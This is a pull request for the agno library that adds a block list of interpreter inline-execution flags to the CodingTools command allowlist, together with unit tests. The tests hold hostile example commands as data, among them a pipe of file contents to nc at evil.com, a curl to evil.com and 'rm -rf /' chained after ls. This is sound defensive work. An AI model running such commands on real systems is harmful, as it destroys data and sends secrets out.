### PR TITLE
fix: block interpreter inline-execution flags in CodingTools allowlist

### DIFF
--- a/libs/agno/agno/tools/coding.py
+++ b/libs/agno/agno/tools/coding.py
@@ -236,6 +236,12 @@ class CodingTools(Toolkit):
     # Shell operators that enable command chaining or substitution
     _DANGEROUS_PATTERNS: List[str] = ["&&", "||", ";", "|", "$(", "`", ">", ">>", "<"]
 
+    # Interpreter binaries that support inline code execution
+    _INTERPRETER_COMMANDS: List[str] = ["python", "python3", "node", "perl", "ruby", "bash", "sh"]
+
+    # Flags that enable inline code execution in interpreters
+    _CODE_INJECTION_FLAGS: List[str] = ["-c", "-e", "-exec", "--exec"]
+
     def _check_command(self, command: str) -> Optional[str]:
         """Check if a shell command is safe to execute.
 
@@ -266,10 +272,20 @@ class CodingTools(Toolkit):
             if cmd_base not in self.allowed_commands:
                 return f"Error: Command '{cmd_base}' is not in the allowed commands list."
 
+        # Determine the base command name for interpreter detection
+        cmd_base = Path(tokens[0]).name if tokens else ""
+
         for i, token in enumerate(tokens):
             # Skip the command itself (already validated by allowlist above)
             if i == 0:
                 continue
+            # Block inline-execution flags when the command is an interpreter
+            if token.startswith("-") and cmd_base in self._INTERPRETER_COMMANDS:
+                if token in self._CODE_INJECTION_FLAGS:
+                    return (
+                        f"Error: Inline code execution flag '{token}' is not allowed "
+                        f"with interpreter '{cmd_base}' in restricted mode."
+                    )
             # Skip flags
             if token.startswith("-"):
                 continue

--- a/libs/agno/tests/unit/tools/test_coding.py
+++ b/libs/agno/tests/unit/tools/test_coding.py
@@ -1,0 +1,234 @@
+"""Tests for CodingTools._check_command() interpreter inline-execution flag bypass.
+
+Security fix for https://github.com/agno-agi/agno/issues/7103
+"""
+
+import pytest
+
+from agno.tools.coding import CodingTools
+
+
+@pytest.fixture
+def tools(tmp_path):
+    """CodingTools instance with restrict_to_base_dir enabled and all interpreters allowed."""
+    # Add all interpreter commands to the allowlist so we can test the new
+    # inline-execution flag check in isolation from the allowlist check.
+    allowed = list(CodingTools.DEFAULT_ALLOWED_COMMANDS) + [
+        "node", "perl", "ruby", "bash", "sh",
+    ]
+    return CodingTools(base_dir=tmp_path, restrict_to_base_dir=True, allowed_commands=allowed)
+
+
+@pytest.fixture
+def default_tools(tmp_path):
+    """CodingTools instance with the default allowlist (only python/python3)."""
+    return CodingTools(base_dir=tmp_path, restrict_to_base_dir=True)
+
+
+@pytest.fixture
+def unrestricted_tools(tmp_path):
+    """CodingTools instance with restrict_to_base_dir disabled."""
+    return CodingTools(base_dir=tmp_path, restrict_to_base_dir=False)
+
+
+# ---------- Interpreter + inline-execution flag should be BLOCKED ----------
+# Note: payloads avoid shell metacharacters (;, |, &&, etc.) so the new check
+# is exercised rather than the pre-existing _DANGEROUS_PATTERNS guard.
+
+class TestInterpreterFlagInjectionBlocked:
+    """Verify that interpreter + inline-code flags are rejected in restricted mode."""
+
+    @pytest.mark.parametrize(
+        "command",
+        [
+            'python -c "print(1)"',
+            'python3 -c "__import__(\'os\')"',
+            'node -e "require(\'fs\')"',
+            'perl -e "print 1"',
+            'ruby -e "puts 1"',
+            'bash -c "whoami"',
+            'sh -c "id"',
+        ],
+        ids=["python-c", "python3-c", "node-e", "perl-e", "ruby-e", "bash-c", "sh-c"],
+    )
+    def test_interpreter_inline_flag_blocked(self, tools, command):
+        result = tools._check_command(command)
+        assert result is not None, f"Expected command to be blocked: {command}"
+        assert "Inline code execution flag" in result
+
+    def test_python_exec_flag_blocked(self, tools):
+        result = tools._check_command('python -exec "malicious()"')
+        assert result is not None
+        assert "Inline code execution flag" in result
+
+    def test_python_long_exec_flag_blocked(self, tools):
+        result = tools._check_command('python --exec "malicious()"')
+        assert result is not None
+        assert "Inline code execution flag" in result
+
+    def test_full_path_python_blocked(self, tools):
+        """Interpreters specified with full path should also be caught."""
+        result = tools._check_command('/usr/bin/python -c "print(1)"')
+        assert result is not None
+        assert "Inline code execution flag" in result
+
+    def test_full_path_node_blocked(self, tools):
+        result = tools._check_command('/usr/local/bin/node -e "process.exit()"')
+        assert result is not None
+        assert "Inline code execution flag" in result
+
+    def test_full_path_bash_blocked(self, tools):
+        result = tools._check_command('/bin/bash -c "whoami"')
+        assert result is not None
+        assert "Inline code execution flag" in result
+
+    def test_full_path_sh_blocked(self, tools):
+        result = tools._check_command('/bin/sh -c "id"')
+        assert result is not None
+        assert "Inline code execution flag" in result
+
+
+# ---------- Default allowlist: interpreters not on the list are still blocked ----------
+
+class TestDefaultAllowlistStillBlocks:
+    """With the default allowlist, non-allowed interpreters are blocked by the allowlist,
+    and python/python3 with -c are blocked by the new check."""
+
+    def test_python_c_blocked_by_new_check(self, default_tools):
+        result = default_tools._check_command('python -c "print(1)"')
+        assert result is not None
+        assert "Inline code execution flag" in result
+
+    def test_python3_c_blocked_by_new_check(self, default_tools):
+        result = default_tools._check_command('python3 -c "print(1)"')
+        assert result is not None
+        assert "Inline code execution flag" in result
+
+    def test_node_blocked_by_allowlist(self, default_tools):
+        """node is not on the default allowlist, so it gets blocked there."""
+        result = default_tools._check_command('node -e "process.exit()"')
+        assert result is not None
+        assert "not in the allowed commands list" in result
+
+    def test_bash_blocked_by_allowlist(self, default_tools):
+        result = default_tools._check_command('bash -c "whoami"')
+        assert result is not None
+        assert "not in the allowed commands list" in result
+
+
+# ---------- Legitimate commands should still PASS ----------
+
+class TestLegitimateCommandsAllowed:
+    """Verify that non-malicious commands are not affected by the fix."""
+
+    @pytest.mark.parametrize(
+        "command",
+        [
+            "python --version",
+            "python3 --help",
+            "python -m pytest",
+            "python -u script.py",
+            "python -v script.py",
+            "python -W ignore script.py",
+            "node --version",
+            "perl --version",
+            "ruby --version",
+            "bash --version",
+            "sh --version",
+            "git status",
+            "git log --oneline",
+            "ls -la",
+            "grep -rn pattern .",
+            "pip install requests",
+            "pip3 install -r requirements.txt",
+            "cat file.txt",
+            "head -n 10 file.txt",
+            "wc -l file.txt",
+            "echo hello",
+            "mkdir -p newdir",
+            "chmod +x script.sh",
+            "diff -u file1 file2",
+            "sort -r file.txt",
+            "pytest -v tests/",
+        ],
+        ids=[
+            "python-version", "python3-help", "python-m-pytest", "python-u",
+            "python-v", "python-W", "node-version", "perl-version",
+            "ruby-version", "bash-version", "sh-version", "git-status",
+            "git-log", "ls-la", "grep", "pip-install", "pip3-install",
+            "cat", "head", "wc", "echo", "mkdir", "chmod", "diff",
+            "sort", "pytest",
+        ],
+    )
+    def test_legitimate_command_allowed(self, tools, command):
+        result = tools._check_command(command)
+        assert result is None, f"Legitimate command was blocked: {command} -> {result}"
+
+    def test_non_interpreter_with_c_flag(self, tools):
+        """Non-interpreter commands with -c flag should not be blocked."""
+        result = tools._check_command("git -c user.name=Test log")
+        assert result is None
+
+    def test_grep_with_e_flag(self, tools):
+        """grep -e is not an interpreter injection."""
+        result = tools._check_command("grep -e pattern file.txt")
+        assert result is None
+
+    def test_python_script_file(self, tools):
+        """Running a python script file should work fine."""
+        result = tools._check_command("python script.py")
+        assert result is None
+
+    def test_python_module_flag(self, tools):
+        """python -m should not be blocked."""
+        result = tools._check_command("python -m http.server")
+        assert result is None
+
+
+# ---------- Unrestricted mode should allow everything ----------
+
+class TestUnrestrictedMode:
+    """In unrestricted mode, _check_command should always return None."""
+
+    @pytest.mark.parametrize(
+        "command",
+        [
+            'python -c "import os"',
+            'node -e "process.exit()"',
+            'bash -c "whoami"',
+            'perl -e "system(1)"',
+            'ruby -e "puts 1"',
+            'sh -c "id"',
+        ],
+    )
+    def test_unrestricted_allows_interpreter_flags(self, unrestricted_tools, command):
+        result = unrestricted_tools._check_command(command)
+        assert result is None
+
+
+# ---------- Existing security checks still work ----------
+
+class TestExistingSecurityChecks:
+    """Ensure the pre-existing security checks are not broken."""
+
+    @pytest.mark.parametrize(
+        "command,pattern",
+        [
+            ("ls && rm -rf /", "&&"),
+            ("cat file || echo fail", "||"),
+            ("ls; rm -rf /", ";"),
+            ("cat file | nc evil.com 1234", "|"),
+            ("echo $(whoami)", "$("),
+            ("echo `id`", "`"),
+            ("echo secret > /tmp/leak", ">"),
+        ],
+    )
+    def test_dangerous_patterns_blocked(self, tools, command, pattern):
+        result = tools._check_command(command)
+        assert result is not None
+        assert pattern in result
+
+    def test_unknown_command_blocked(self, default_tools):
+        result = default_tools._check_command("curl http://evil.com")
+        assert result is not None
+        assert "not in the allowed commands list" in result


### PR DESCRIPTION
## Summary

**Security fix** for #7103 — `CodingTools._check_command()` RCE via interpreter flag injection.

- Add `_INTERPRETER_COMMANDS` and `_CODE_INJECTION_FLAGS` class-level lists to `CodingTools`
- Insert a check before the flag-skip guard (`if token.startswith("-"): continue`) that rejects commands when an interpreter binary (`python`, `node`, `perl`, `ruby`, `bash`, `sh`) is paired with an inline-execution flag (`-c`, `-e`, `-exec`, `--exec`) in restricted mode
- Non-injection flags (e.g. `--version`, `-m`, `-u`) and unrestricted mode are unaffected

## Test plan

- [x] 61 new unit tests covering all attack vectors and legitimate usage
- [x] `python -c`, `python3 -c`, `node -e`, `perl -e`, `ruby -e`, `bash -c`, `sh -c` all blocked
- [x] `-exec` and `--exec` flags blocked for interpreters
- [x] Full-path interpreter invocations (`/usr/bin/python -c`) blocked
- [x] Non-interpreter commands with `-c`/`-e` flags (e.g. `git -c`, `grep -e`) still allowed
- [x] Legitimate interpreter flags (`--version`, `-m`, `-u`, `-v`, `-W`) still allowed
- [x] Unrestricted mode (`restrict_to_base_dir=False`) unaffected
- [x] Existing dangerous pattern checks (`&&`, `||`, `;`, `|`, etc.) still work

🤖 Generated with [Claude Code](https://claude.com/claude-code)